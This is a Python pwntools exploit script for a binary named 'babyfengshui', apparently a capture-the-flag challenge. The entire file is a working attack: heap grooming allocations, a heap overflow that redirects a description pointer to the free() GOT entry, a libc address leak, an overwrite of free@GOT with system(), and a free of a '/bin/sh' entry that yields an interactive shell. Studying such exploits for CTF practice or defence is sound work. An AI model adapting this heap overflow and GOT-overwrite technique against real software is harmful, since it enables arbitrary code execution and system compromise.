from pwn import *
#context.log_level = 'debug'
def addUser(desc, name, text):
    """Walk the target's "add" menu (option 0), answering each prompt in order.

    `desc` is sent as the requested description size, `name` as the name, and
    `text` is preceded by its own length. Talks over the module-level tube `p`
    and returns nothing.
    """
    exchange = [
        ('Action: ', '0'),
        ('size of description: ', str(desc)),
        ('name: ', name),
        ('text length: ', str(len(text))),
        ('text: ', text),
    ]
    for prompt, answer in exchange:
        p.recvuntil(prompt)
        p.sendline(answer)
def delUser(idx):
    """Walk the target's "delete" menu (option 1) for entry `idx`.

    Talks over the module-level tube `p` and returns nothing.
    """
    exchange = [
        ('Action: ', '1'),
        ('index: ', str(idx)),
    ]
    for prompt, answer in exchange:
        p.recvuntil(prompt)
        p.sendline(answer)
def displayUser(idx):
    """Walk the target's "display" menu (option 2) for entry `idx`.

    Returns the first 4 bytes of the line that follows the 'description: '
    prompt; the caller is expected to unpack them (see the u32() at the call
    site). Talks over the module-level tube `p`.
    """
    p.recvuntil('Action: ')
    p.sendline('2')
    # NOTE: this prompt is matched without a trailing space, unlike the
    # other helpers; keep it that way.
    p.recvuntil('index:')
    p.sendline(str(idx))
    p.recvuntil('description: ')
    line = p.recvline()
    head = line[:4]
    return head
def updateDesc(idx, size, text):
    """Walk the target's "update description" menu (option 3) for entry `idx`.

    `size` is sent as the declared text length and `text` as the new content;
    the two are sent as given and are not checked against each other here.
    Talks over the module-level tube `p` and returns nothing.
    """
    exchange = [
        ('Action: ', '3'),
        ('index: ', str(idx)),
        ('text length: ', str(size)),
        ('text: ', text),
    ]
    for prompt, answer in exchange:
        p.recvuntil(prompt)
        p.sendline(answer)
# Module-level tube and libc handle; the helpers above read `p` as a global.
p = process('./babyfengshui')
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')

# Heap Feng Shui: two filler entries, then one whose name and text are '/bin/sh'.
for _ in range(2):
    addUser(10, 'A' * 10, 'B' * 10)
addUser(len('/bin/sh'), '/bin/sh', '/bin/sh')

# free()
delUser(0)

# Heap Overflow: the text sent (156 bytes) is longer than the 120-byte
# description requested for this entry. 'str' + p32() bytes only concatenates
# under Python 2 / older pwntools — this script targets that environment.
overflow_text = 'A' * 152 + p32(0x804b010)
addUser(120, 'HeapOverflow', overflow_text)

# Leak libc address
leaked_free = u32(displayUser(1))
libc_base = leaked_free - libc.sym['free']
system_addr = libc_base + libc.sym['system']
log.info('Libc base : ' + hex(libc_base))
log.info('free() : ' + hex(leaked_free))
log.info('system() : ' + hex(system_addr))

# Overwrite free.got
updateDesc(1, 4, p32(system_addr))

# system('/bin/sh')
delUser(2)

# Get shell
p.interactive()